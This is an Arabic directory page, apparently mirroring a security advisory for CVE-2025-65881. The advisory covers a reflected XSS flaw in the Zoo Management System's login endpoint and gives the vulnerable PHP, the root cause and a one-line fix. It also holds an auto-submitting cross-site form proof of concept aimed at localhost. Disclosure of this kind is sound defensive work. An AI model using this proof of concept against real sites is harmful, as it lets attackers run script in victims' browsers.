Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-65881 — Sourcecodester Zoo Management System v1.0 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) في /classes/Login.php بسبب Content-Type غير صالح | Kitploit
أدوات/GitHubGitHub/mmakingdom/cve-2025-65881
تحليل الثغرات الأمنيةتحليل الكوداستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubmmakingdom/cve-2025-65881

CVE-2025-65881

Sourcecodester Zoo Management System v1.0 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) في /classes/Login.php بسبب Content-Type غير صالح

عرض المستودع
7منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-65881

مشروع Zoo Management System v1.00 عرضة لثغرة البرمجة النصية عبر المواقع (XSS) في /zms/classes/Login.php?f=login بسبب:

  1. Content-type غير صالح لاستجابات JSON في /zms/classes/Login.php?f=login
  2. إدخال المستخدم غير المعقّم في الاستجابات

مما يسمح للمهاجمين غير المصادَق عليهم بحقن HTML/JS خبيث يتم تنفيذه في متصفحات الضحايا.

الملف المتأثر والكود الضعيف

/zms/classes/Login.php

return json_encode(array(
    'status' => 'incorrect',
    'last_qry' => "SELECT * from users where username = '$username' and password = md5('$password') "
));

السبب الجذري

  1. لا تعيّن نقطة النهاية نوع المحتوى إلى application/json.
  2. لا يتم تعقيم معامل $username عند استخدامه في استعلامات SQL أو عند انعكاسه في الاستجابة، وقد أدى هذا العيب نفسه سابقًا إلى ثغرة حقن SQL (CVE-2025-7160)

المعالجة

أضف هذا السطر في الدالة login():

public function login(){
		header('Content-Type: application/json; charset=utf-8');
		extract($_POST);

header

إثبات المفهوم

<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="http://localhost/zms/classes/Login.php?f=login" method="post">
      <input type="hidden" name="username" value="awdawdawdawdawaaaa$" />
    <input type="hidden" name="password" value="awdawda" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

XSS

المراجع

يمكن تنزيل الكود المصدري مجانًا من هنا:

https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html

الفضل

Muntadhar M. Ahmed (almuntadhar0x01)

تنزيل الأداة